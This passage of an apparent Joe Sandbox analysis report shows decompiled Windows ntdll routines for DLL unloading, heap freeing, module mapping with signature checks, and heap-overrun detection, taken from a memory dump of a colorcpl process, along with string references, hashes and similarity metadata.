						_t87 = _t88 - (_t99 & 0x0000001f);
						asm("ror ebx, cl");
						_t82 = _t83 ^ _t99;
					}
					E0434FED0(0x44332d8);
					_t49 =  *_t110;
					while(1) {
						_v20 = _t49;
						__eflags = _t49 - _t110;
						if(_t49 == _t110) {
							break;
						}
						_t16 = _t49 - 0x54; // 0x771f36a0
						_t108 = _t16;
						__eflags =  *(_t108 + 0x34) & 0x00000008;
						if(( *(_t108 + 0x34) & 0x00000008) != 0) {
							_push(_t87);
							_t102 = 2;
							E04360C2C(_t108, _t102);
							__eflags = _t82;
							if(_t82 != 0) {
								 *0x44391e0(_t108);
								 *_t82();
							}
							_t87 = _t108;
							E043498DE(_t87, 1);
							_t79 = _v24;
							__eflags =  *(_t79 + 0x68) & 0x00000100;
							if(( *(_t79 + 0x68) & 0x00000100) != 0) {
								_t87 = _t108;
								E043C85AA(_t87);
							}
						}
						__eflags =  *0x44337c0 & 0x00000005;
						if(__eflags != 0) {
							_t43 = _t108 + 0x24; // -48
							E043BE692("minkernel\\ntdll\\ldrsnap.c", 0xcdd, "LdrpUnloadNode", 2, "Unmapping DLL \"%wZ\"\n", _t43);
							_t115 = _t115 + 0x18;
						}
						_push(0);
						_push( *((intOrPtr*)(_t108 + 0x18)));
						E0436A390(_t82, _t87, _t108, _t110, __eflags);
						_t49 =  *_v28;
					}
					_push(0x44332d8);
					_t50 = E0434E740(_t87);
					while(1) {
						L3:
						_t89 =  *(_t110 + 0x18);
						if(_t89 == 0) {
							break;
						}
						_t104 =  *_t89;
						__eflags = _t104 - _t89;
						if(_t104 != _t89) {
							_t50 =  *_t104;
							 *_t89 = _t50;
						} else {
							_t32 = _t110 + 0x18;
							 *_t32 =  *(_t110 + 0x18) & 0x00000000;
							__eflags =  *_t32;
						}
						__eflags = _t104;
						if(_t104 == 0) {
							break;
						} else {
							L04352330(_t50, 0x4436668);
							_t86 =  *((intOrPtr*)(_t104 + 4));
							_t35 = _t104 + 8; // 0x8
							_t100 = _t35;
							_t93 =  *(_t86 + 0x1c);
							_t60 =  *_t93;
							_v16 = _t60;
							__eflags = _t60 - _t100;
							if(_t60 == _t100) {
								L27:
								 *_t93 =  *_t100;
								__eflags =  *(_t86 + 0x1c) - _t100;
								if(__eflags == 0) {
									asm("sbb eax, eax");
									_t69 =  ~(_t93 - _t100) & _t93;
									__eflags = _t69;
									 *(_t86 + 0x1c) = _t69;
								}
								_push( &_v4);
								E0435D963(_t86, _t86, 0, _t104, _t110, __eflags);
								E043524D0(0x4436668);
								__eflags = _v12;
								if(_v12 != 0) {
									E04369723(_t86, 0);
								}
								_t50 = E04353BC0( *0x4435d74, 0, _t104);
								continue;
							}
							_t112 = _t60;
							do {
								_t70 =  *_t112;
								_t93 = _t112;
								_t112 = _t70;
								__eflags = _t70 - _t100;
							} while (_t70 != _t100);
							_t110 = _v8;
							goto L27;
						}
					}
					_t105 =  *_t110;
					 *(_t110 + 0x20) = 0xfffffffe;
					if(_t105 == _t110) {
						L8:
						return _t50;
					} else {
						goto L5;
					}
					do {
						L5:
						_t85 =  *_t105;
						_t107 = _t105 + 0xffffffac;
						 *(_t107 + 0x34) =  *(_t107 + 0x34) | 0x00000002;
						E04369938(L04352330(_t50, 0x4436668), _t107);
						if(( *(_t107 + 0x34) & 0x00000080) != 0) {
							_t28 = _t107 + 0x74; // -56
							L04369B40(_t85, _t107, _t110, 0x44367ac);
							_t29 = _t107 + 0x68; // -68
							L04369B40(_t85, _t107, _t110, 0x44367a4);
							 *(_t107 + 0x20) =  *(_t107 + 0x20) & 0x00000000;
						}
						E043524D0(0x4436668);
						if( *0x4435d70 != 0) {
							E0437680F(_t107);
						}
						_t50 = E0435D3E1(_t85, _t107, _t110);
						_t105 = _t85;
					} while (_t85 != _t110);
					goto L8;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 7) {
					goto L10;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 9) {
					goto L9;
				}
				goto L3;
			}

0x04369723
0x0436972b
0x04369736
0x04369738
0x0436973c
0x0436973e
0x04369742
0x04369747
0x043697bc
0x043697bc
0x043697bc
0x043697bc
0x043697c0
0x043697c5
0x043697c5
0x043697cb
0x04369900
0x04369908
0x04369913
0x04369914
0x04369916
0x04369918
0x04369918
0x043697d6
0x043697db
0x043697dd
0x043697dd
0x043697e1
0x043697e3
0x00000000
0x00000000
0x043697e5
0x043697e5
0x043697e8
0x043697ec
0x043697ee
0x043697f1
0x043697f4
0x043697f9
0x043697fb
0x04369922
0x04369928
0x04369928
0x04369803
0x04369805
0x0436980a
0x0436980e
0x04369815
0x043adade
0x043adae0
0x043adae0
0x04369815
0x0436981b
0x04369822
0x043adaea
0x043adb04
0x043adb09
0x043adb09
0x04369828
0x0436982a
0x0436982d
0x04369836
0x04369836
0x0436983a
0x0436983f
0x04369755
0x04369755
0x04369755
0x0436975a
0x00000000
0x00000000
0x0436986e
0x04369870
0x04369872
0x0436992f
0x04369931
0x04369878
0x04369878
0x04369878
0x04369878
0x04369878
0x0436987c
0x0436987e
0x00000000
0x04369884
0x04369889
0x0436988e
0x04369891
0x04369891
0x04369894
0x04369897
0x04369899
0x0436989d
0x0436989f
0x043698b1
0x043698b3
0x043698b5
0x043698b8
0x043698c0
0x043698c2
0x043698c2
0x043698c4
0x043698c4
0x043698cd
0x043698d0
0x043698da
0x043698df
0x043698e4
0x043698e8
0x043698e8
0x043698f6
0x00000000
0x043698f6
0x043698a1
0x043698a3
0x043698a3
0x043698a5
0x043698a7
0x043698a9
0x043698a9
0x043698ad
0x00000000
0x043698ad
0x0436987e
0x04369760
0x04369762
0x0436976b
0x043697b5
0x043697bb
0x00000000
0x00000000
0x00000000
0x0436976d
0x0436976d
0x0436976d
0x0436976f
0x04369777
0x04369782
0x0436978b
0x04369849
0x04369852
0x04369857
0x04369860
0x04369865
0x04369865
0x04369796
0x043697a2
0x043adb13
0x043adb13
0x043697aa
0x043697af
0x043697b1
0x00000000
0x0436976d
0x0436974d
0x00000000
0x00000000
0x04369753
0x00000000
0x00000000
0x00000000

Strings

Unmapping DLL "%wZ", xrefs: 043ADAEE
minkernel\ntdll\ldrsnap.c, xrefs: 043ADAFF
LdrpUnloadNode, xrefs: 043ADAF5

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 0-2283098728
Opcode ID: d5f43d4d8d37b92d20b0c57e8fdf3f75b7adcf2642501da1fcffe4c9d7dfa38e
Instruction ID: 43175eda26430358ff883616f8a1308fd7087cf0bfdeff01c5d90e8eb8fddf52
Opcode Fuzzy Hash: d5f43d4d8d37b92d20b0c57e8fdf3f75b7adcf2642501da1fcffe4c9d7dfa38e
Instruction Fuzzy Hash: 5F513DB17007039BEB24EF38C884B297795BF84B14F14A61DE95787699E770B804CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0433F75B Relevance: 3.9, Strings: 3, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0433F75B(void* __ecx, signed short* __edx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				signed char _t63;
				signed int _t67;
				void* _t71;
				intOrPtr _t72;
				void* _t79;
				signed char* _t82;
				intOrPtr _t83;
				signed char* _t88;
				intOrPtr _t89;
				void* _t90;
				signed char* _t93;
				void* _t126;
				signed int* _t127;

				_t127 = __edx;
				_t126 = __ecx;
				_t58 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t31 =  &(_t127[4]); // 0xddeeddfe
					E04398140(_t31, _t58 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t63 =  *(_t126 + 0xcc) ^  *0x4436d48;
				if(_t63 == 0) {
					_t63 = E0433F858(_t127,  &_v12,  &_v8);
					if(_t63 != 0) {
						_t71 = E0433FABA( &_v12,  &_v8, 0x4000);
						_t109 = _t71;
						if(_t71 < 0) {
							_t72 =  *[fs:0x30];
							__eflags =  *(_t72 + 0xc);
							if( *(_t72 + 0xc) == 0) {
								_push("HEAP: ");
								E0433B910();
							} else {
								E0433B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t126);
							_t63 = E0433B910("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t109);
						} else {
							_t79 = E04353C40();
							_t110 = 0x7ffe0380;
							if(_t79 != 0) {
								_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t82 = 0x7ffe0380;
							}
							if( *_t82 != 0) {
								_t83 =  *[fs:0x30];
								__eflags =  *(_t83 + 0x240) & 0x00000001;
								if(( *(_t83 + 0x240) & 0x00000001) != 0) {
									E043FF13E(_t110, _t126, _v12, _v8, 7);
								}
							}
							 *((intOrPtr*)(_t126 + 0x220)) =  *((intOrPtr*)(_t126 + 0x220)) + 1;
							 *((intOrPtr*)(_t126 + 0x240)) =  *((intOrPtr*)(_t126 + 0x240)) + 1;
							 *((intOrPtr*)(_t126 + 0x244)) =  *((intOrPtr*)(_t126 + 0x244)) + _v8;
							 *((intOrPtr*)(_t126 + 0x230)) =  *((intOrPtr*)(_t126 + 0x230)) + 1;
							if(E04353C40() != 0) {
								_t88 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t88 = _t110;
							}
							if( *_t88 != 0) {
								_t89 =  *[fs:0x30];
								__eflags =  *(_t89 + 0x240) & 0x00000001;
								if(( *(_t89 + 0x240) & 0x00000001) != 0) {
									__eflags = E04353C40();
									if(__eflags != 0) {
										_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E043FF058(_t110, _t126, _v12, __eflags, _v8,  *(_t126 + 0x74) << 3, 0, 0,  *_t110 & 0x000000ff);
								}
							}
							_t90 = E04353C40();
							_t111 = 0x7ffe038a;
							if(_t90 != 0) {
								_t93 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t93 = 0x7ffe038a;
							}
							if( *_t93 != 0) {
								__eflags = E04353C40();
								if(__eflags != 0) {
									_t111 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								}
								E043FF058(_t111, _t126, _v12, __eflags, _v8,  *(_t126 + 0x74) << 3, 0, 0,  *_t111 & 0x000000ff);
							}
							_t63 = _t127[0] & 0x00000013 | 0x00000008;
							_t127[0] = _t63;
						}
					}
				}
				if( *((intOrPtr*)(_t126 + 0x4c)) != 0) {
					_t127[0] = _t127[0] ^ _t127[0] ^  *_t127;
					_t67 =  *(_t126 + 0x50);
					 *_t127 =  *_t127 ^ _t67;
					return _t67;
				}
				return _t63;
			}

0x0433f765
0x0433f768
0x0433f76a
0x0433f76d
0x0433f771
0x0433f779
0x0433f77c
0x0439e322
0x0439e326
0x0439e32b
0x0439e32b
0x0433f788
0x0433f78e
0x0433f79e
0x0433f7a5
0x0433f7b7
0x0433f7bc
0x0433f7c0
0x0439e419
0x0439e41f
0x0439e423
0x0439e442
0x0439e447
0x0439e425
0x0439e43a
0x0439e43f
0x0439e44d
0x0439e450
0x0439e453
0x0439e45a
0x0433f7c6
0x0433f7c6
0x0433f7cb
0x0433f7d2
0x0439e33d
0x0433f7d8
0x0433f7d8
0x0433f7d8
0x0433f7dd
0x0439e347
0x0439e34d
0x0439e354
0x0439e364
0x0439e364
0x0439e354
0x0433f7e3
0x0433f7ec
0x0433f7f2
0x0433f7f8
0x0433f805
0x0439e377
0x0433f80b
0x0433f80b
0x0433f80b
0x0433f810
0x0439e381
0x0439e387
0x0439e38e
0x0439e399
0x0439e39b
0x0439e3a6
0x0439e3a6
0x0439e3a6
0x0439e3c3
0x0439e3c3
0x0439e38e
0x0433f816
0x0433f81b
0x0433f822
0x0439e3d6
0x0433f828
0x0433f828
0x0433f828
0x0433f82d
0x0439e3e5
0x0439e3e7
0x0439e3f2
0x0439e3f2
0x0439e3f2
0x0439e40f
0x0439e40f
0x0433f838
0x0433f83a
0x0433f83a
0x0433f7c0
0x0433f7a5
0x0433f841
0x0433f84b
0x0433f84e
0x0433f851
0x00000000
0x0433f851
0x0433f857

Strings

HEAP: , xrefs: 0439E442
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0439E455
HEAP[%wZ]: , xrefs: 0439E435

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: 70b45bb6ccffc6043bd2484195c180ef06be1fd245f271391f6e75780f4f9dcd
Instruction ID: b699a43a0af5a038ecb7f8f7f4a8151fd3919537ee4dd0ed510867a550e2a2d3
Opcode Fuzzy Hash: 70b45bb6ccffc6043bd2484195c180ef06be1fd245f271391f6e75780f4f9dcd
Instruction Fuzzy Hash: 2C511731700684AFEB15DBA8C885F6ABBF8FF04749F0460A5E9458B692D774FD00DB50

Uniqueness

Uniqueness Score: -1.00%

Function 04361514 Relevance: 3.9, Strings: 3, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E04361514(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _t66;
				signed int _t69;
				void* _t73;
				signed int _t75;
				char* _t78;
				intOrPtr _t79;
				signed int _t80;
				char* _t83;
				intOrPtr _t84;
				signed int _t85;
				signed int _t92;
				signed char* _t93;
				signed char _t98;
				intOrPtr _t103;
				signed int _t104;
				void* _t107;
				signed int _t118;
				intOrPtr _t119;
				intOrPtr _t120;

				_t103 = __edx;
				_v8 = __ecx;
				_t118 = 0;
				_t119 =  *((intOrPtr*)(__ecx + 0x20));
				_v16 = __edx;
				_t107 = E0434DE20(__ecx, __eflags,  *((intOrPtr*)(_t119 + 0x18)), 1, 0xe,  &_v20);
				if(_t107 != 0) {
					_t66 = _v8;
					__eflags =  *(_t66 + 0x10) & 0x00800000;
					if(( *(_t66 + 0x10) & 0x00800000) != 0) {
						L19:
						_t118 = 0xc000007b;
						L6:
						return _t118;
					}
					_t69 =  *(_t119 + 0x34) | 0x00400000;
					 *(_t119 + 0x34) = _t69;
					__eflags =  *(_t107 + 0x10) & 0x00000001;
					if(__eflags == 0) {
						goto L1;
					}
					 *(_t119 + 0x34) = _t69 | 0x01000000;
					_t118 = E04336DD0( *((intOrPtr*)(_t119 + 0x18)), __eflags);
					__eflags = _t118;
					if(_t118 < 0) {
						goto L6;
					} else {
						goto L1;
					}
					goto L19;
				}
				L1:
				if(( *(_t103 + 0x16) & 0x00002000) == 0) {
					 *(_t119 + 0x34) =  *(_t119 + 0x34) & 0xfffffffb;
					goto L6;
				}
				if(( *( *((intOrPtr*)(_t119 + 0x5c)) + 0x10) & 0x00000080) != 0) {
					__eflags =  *(_t103 + 0x5e) & 0x00000080;
					if(( *(_t103 + 0x5e) & 0x00000080) != 0) {
						goto L3;
					}
					_t98 =  *0x44337c0; // 0x0
					__eflags = _t98 & 0x00000003;
					if((_t98 & 0x00000003) != 0) {
						_t45 = _t119 + 0x24; // 0x123
						E043BE692("minkernel\\ntdll\\ldrmap.c", 0x3a2, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t45);
						_t98 =  *0x44337c0; // 0x0
					}
					__eflags = _t98 & 0x00000010;
					if((_t98 & 0x00000010) != 0) {
						asm("int3");
					}
					_t118 = 0xc0000428;
					goto L6;
				}
				L3:
				if(( *(_t119 + 0x34) & 0x01000000) != 0) {
					goto L6;
				}
				_t73 = _a4 - 0x40000003;
				if(_t73 == 0 || _t73 == 0x33) {
					_v12 =  *((intOrPtr*)(_t119 + 0x18));
					_t75 = E04353C40();
					__eflags = _t75;
					if(_t75 != 0) {
						_t78 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t78 = 0x7ffe0384;
					}
					__eflags =  *_t78;
					_t104 = 0x7ffe0385;
					if( *_t78 != 0) {
						_t79 =  *[fs:0x30];
						__eflags =  *(_t79 + 0x240) & 0x00000004;
						if(( *(_t79 + 0x240) & 0x00000004) != 0) {
							_t92 = E04353C40();
							__eflags = _t92;
							if(_t92 == 0) {
								_t93 = 0x7ffe0385;
							} else {
								_t93 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t93 & 0x00000020;
							if(( *_t93 & 0x00000020) != 0) {
								E043C0227(0x1490, _v12, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					__eflags = _a4 - 0x40000003;
					if(_a4 != 0x40000003) {
						L12:
						_t120 =  *((intOrPtr*)(_t119 + 0x18));
						_t80 = E04353C40();
						__eflags = _t80;
						if(_t80 != 0) {
							_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t83 = 0x7ffe0384;
						}
						__eflags =  *_t83;
						if( *_t83 != 0) {
							_t84 =  *[fs:0x30];
							__eflags =  *(_t84 + 0x240) & 0x00000004;
							if(( *(_t84 + 0x240) & 0x00000004) != 0) {
								_t85 = E04353C40();
								__eflags = _t85;
								if(_t85 != 0) {
									_t104 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
									__eflags = _t104;
								}
								__eflags =  *_t104 & 0x00000020;
								if(( *_t104 & 0x00000020) != 0) {
									E043C0227(0x1491, _t120, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						goto L6;
					} else {
						_t21 = _t119 + 0x24; // 0x123
						_v12 = _t21;
						_t118 = E0437D3EF( *((intOrPtr*)(_t119 + 0x18)),  *((intOrPtr*)(_v8 + 0x5c)), _v16, _t21);
						__eflags = _t118;
						if(_t118 < 0) {
							E0437C98F(_t118, 0x1490, 0, _v12);
							goto L6;
						}
						goto L12;
					}
				} else {
					goto L6;
				}
			}

0x0436151f
0x04361523
0x04361526
0x04361528
0x04361536
0x0436153e
0x04361542
0x043615f5
0x043615f8
0x043615ff
0x043aa34d
0x043aa34d
0x0436157c
0x04361582
0x04361582
0x04361608
0x0436160d
0x04361610
0x04361614
0x00000000
0x00000000
0x043aa35f
0x043aa367
0x043aa369
0x043aa36b
0x00000000
0x043aa371
0x00000000
0x043aa371
0x00000000
0x043aa36b
0x04361548
0x04361551
0x043aa376
0x00000000
0x043aa376
0x0436155e
0x043aa37f
0x043aa383
0x00000000
0x00000000
0x043aa389
0x043aa38e
0x043aa390
0x043aa392
0x043aa3ac
0x043aa3b1
0x043aa3b6
0x043aa3b9
0x043aa3bb
0x043aa3bd
0x043aa3bd
0x043aa3be
0x00000000
0x043aa3be
0x04361564
0x0436156b
0x00000000
0x00000000
0x04361570
0x04361575
0x04361588
0x0436158b
0x04361590
0x04361592
0x043aa3d1
0x04361598
0x04361598
0x04361598
0x0436159d
0x043615a0
0x043615a5
0x043aa3db
0x043aa3e1
0x043aa3e8
0x043aa3ee
0x043aa3f3
0x043aa3f5
0x043aa407
0x043aa3f7
0x043aa400
0x043aa400
0x043aa409
0x043aa40c
0x043aa422
0x043aa422
0x043aa40c
0x043aa3e8
0x043615ab
0x043615b2
0x043615d6
0x043615d6
0x043615d9
0x043615de
0x043615e0
0x043aa44b
0x043615e6
0x043615e6
0x043615e6
0x043615eb
0x043615ee
0x043aa455
0x043aa45b
0x043aa462
0x043aa468
0x043aa46d
0x043aa46f
0x043aa47a
0x043aa47a
0x043aa47a
0x043aa480
0x043aa483
0x043aa498
0x043aa498
0x043aa483
0x043aa462
0x00000000
0x043615b4
0x043615b7
0x043615be
0x043615cc
0x043615ce
0x043615d0
0x043aa438
0x00000000
0x043aa438
0x00000000
0x043615d0
0x00000000
0x00000000
0x00000000

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 043AA396
minkernel\ntdll\ldrmap.c, xrefs: 043AA3A7
LdrpCompleteMapModule, xrefs: 043AA39D

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 53e1551755dcc506275386d06ca4e69625d9a4b40ab4583304fe3ceaf56978ad
Instruction ID: eedec615c4296484541579b3f7181fa517e0bd7b3e7b01930ce4d972c1011d47
Opcode Fuzzy Hash: 53e1551755dcc506275386d06ca4e69625d9a4b40ab4583304fe3ceaf56978ad
Instruction Fuzzy Hash: 83510332B40B469BEB21DF68C948B2AB7E5EF00714F14A154EA539BAE5E774F900CF40

Uniqueness

Uniqueness Score: -1.00%

Function 043ED62C Relevance: 3.9, Strings: 3, Instructions: 163
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E043ED62C(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed int _t52;
				intOrPtr _t53;
				signed int _t63;
				signed short _t64;
				intOrPtr _t67;
				signed short _t71;
				signed int _t74;
				signed short _t75;
				signed short _t77;
				void* _t81;
				signed int _t82;
				signed int _t83;
				signed char _t92;
				unsigned int _t97;
				unsigned int _t102;
				signed int _t106;
				void* _t108;
				void* _t109;
				unsigned int _t112;

				_t82 = __ecx;
				_push(__ecx);
				_t112 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t71 =  *__edx;
							if(( *(__ecx + 0x4c) & _t71) != 0) {
								_t71 = _t71 ^  *(__ecx + 0x50);
							}
							_t44 = _t71 & 0x0000ffff;
						}
					} else {
						_t102 = __edx >> 0x00000003 ^  *__edx ^  *0x4436964 ^ __ecx;
						if(_t102 == 0) {
							_t74 =  *((intOrPtr*)(__edx - (_t102 >> 0xd)));
						} else {
							_t74 = 0;
						}
						_t44 =  *((intOrPtr*)(_t74 + 0x14));
					}
					_t92 =  *((intOrPtr*)(_t112 + 7));
					_t106 = _t44 & 0xffff;
					if(_t92 != 5) {
						if((_t92 & 0x00000040) == 0) {
							if((_t92 & 0x0000003f) == 0x3f) {
								if(_t92 >= 0) {
									if( *(_t82 + 0x4c) == 0) {
										_t48 =  *_t112 & 0x0000ffff;
									} else {
										_t64 =  *_t112;
										if(( *(_t82 + 0x4c) & _t64) != 0) {
											_t64 = _t64 ^  *(_t82 + 0x50);
										}
										_t48 = _t64 & 0x0000ffff;
									}
								} else {
									_t97 = _t112 >> 0x00000003 ^  *_t112 ^  *0x4436964 ^ _t82;
									if(_t97 == 0) {
										_t67 =  *((intOrPtr*)(_t112 - (_t97 >> 0xd)));
									} else {
										_t67 = 0;
									}
									_t48 =  *((intOrPtr*)(_t67 + 0x14));
								}
								_t83 =  *(_t112 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t83 = _t92 & 0x3f;
							}
						} else {
							_t83 =  *(_t112 + 4 + (_t92 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t83 =  *(_t82 + 0x54) & 0x0000ffff ^  *(_t112 + 4) & 0x0000ffff;
					}
					_t108 = (_t106 << 3) - _t83;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t75 =  *__edx & 0x0000ffff;
					} else {
						_t77 =  *__edx;
						if(( *(__ecx + 0x4c) & _t77) != 0) {
							_t77 = _t77 ^  *(__ecx + 0x50);
						}
						_t75 = _t77 & 0x0000ffff;
					}
					_t108 =  *((intOrPtr*)(_t112 - 8)) - (_t75 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t112 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t63 = _t51 & 0x3f;
					goto L38;
				} else {
					_t63 =  *(_t112 + 6) & 0x000000ff;
					L38:
					_t52 = _t63 << 3;
					L42:
					_t109 = _t108 + _t52;
					_t35 = _t112 + 8; // -16
					_t81 = _t35 + _t109;
					_t53 = E04398050(_t81, 0x43172b8, 8);
					_v8 = _t53;
					if(_t53 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0433B910();
					} else {
						E0433B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t109);
					_push(_v8 + _t81);
					E0433B910("Heap block at %p modified at %p past requested size of %Ix\n", _t112);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x44347a1 = 1;
						asm("int3");
						 *0x44347a1 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}

0x043ed62c
0x043ed631
0x043ed634
0x043ed637
0x043ed63c
0x043ed7de
0x043ed7de
0x043ed7e0
0x043ed7e4
0x043ed7e4
0x043ed644
0x043ed66d
0x043ed698
0x043ed6a9
0x043ed69a
0x043ed69a
0x043ed69f
0x043ed6a1
0x043ed6a1
0x043ed6a4
0x043ed6a4
0x043ed66f
0x043ed67a
0x043ed67f
0x043ed68c
0x043ed681
0x043ed681
0x043ed681
0x043ed68e
0x043ed68e
0x043ed6ac
0x043ed6b2
0x043ed6b8
0x043ed6c9
0x043ed6de
0x043ed6ea
0x043ed717
0x043ed728
0x043ed719
0x043ed719
0x043ed71e
0x043ed720
0x043ed720
0x043ed723
0x043ed723
0x043ed6ec
0x043ed6f9
0x043ed6fe
0x043ed70b
0x043ed700
0x043ed700
0x043ed700
0x043ed70d
0x043ed70d
0x043ed731
0x043ed6e0
0x043ed6e3
0x043ed6e3
0x043ed6cb
0x043ed6d1
0x043ed6d1
0x043ed6ba
0x043ed6c2
0x043ed6c2
0x043ed738
0x043ed646
0x043ed64a
0x043ed65b
0x043ed64c
0x043ed64c
0x043ed651
0x043ed653
0x043ed653
0x043ed656
0x043ed656
0x043ed664
0x043ed664
0x043ed73a
0x043ed73f
0x043ed74c
0x043ed756
0x00000000
0x043ed756
0x043ed751
0x00000000
0x043ed741
0x043ed741
0x043ed745
0x043ed745
0x043ed758
0x043ed75a
0x043ed75c
0x043ed764
0x043ed767
0x043ed76c
0x043ed772
0x00000000
0x00000000
0x043ed77f
0x043ed79f
0x043ed7a4
0x043ed781
0x043ed797
0x043ed79c
0x043ed7ad
0x043ed7b0
0x043ed7b7
0x043ed7c9
0x043ed7cb
0x043ed7d2
0x043ed7d3
0x043ed7d3
0x043ed7da
0x00000000
0x043ed7da

Strings

HEAP: , xrefs: 043ED79F
HEAP[%wZ]: , xrefs: 043ED792
Heap block at %p modified at %p past requested size of %Ix, xrefs: 043ED7B2

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: 405f1dc1e64a6213c61a9531b5d3a609bf8061e07a15c9defc320d9d61c0c122
Instruction ID: 55f61182b1bc807477cc7984fe215208cca4e0b431dbaf43a7103f3922fa8f70
Opcode Fuzzy Hash: 405f1dc1e64a6213c61a9531b5d3a609bf8061e07a15c9defc320d9d61c0c122
Instruction Fuzzy Hash: B3512439202662CEF764CF2BC44477273E5DF45344F55684AE4C68BAC5E236F842EB20

Uniqueness

Uniqueness Score: -1.00%

Function 0437C640 Relevance: 3.9, Strings: 3, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0437C640(void* __ebx, signed int __ecx, void* __edx, void* __edi) {
				signed int _v20;
				signed int _v36;
				char _v544;
				char _v552;
				char _v556;
				char* _v560;
				short _v562;
				signed int _v564;
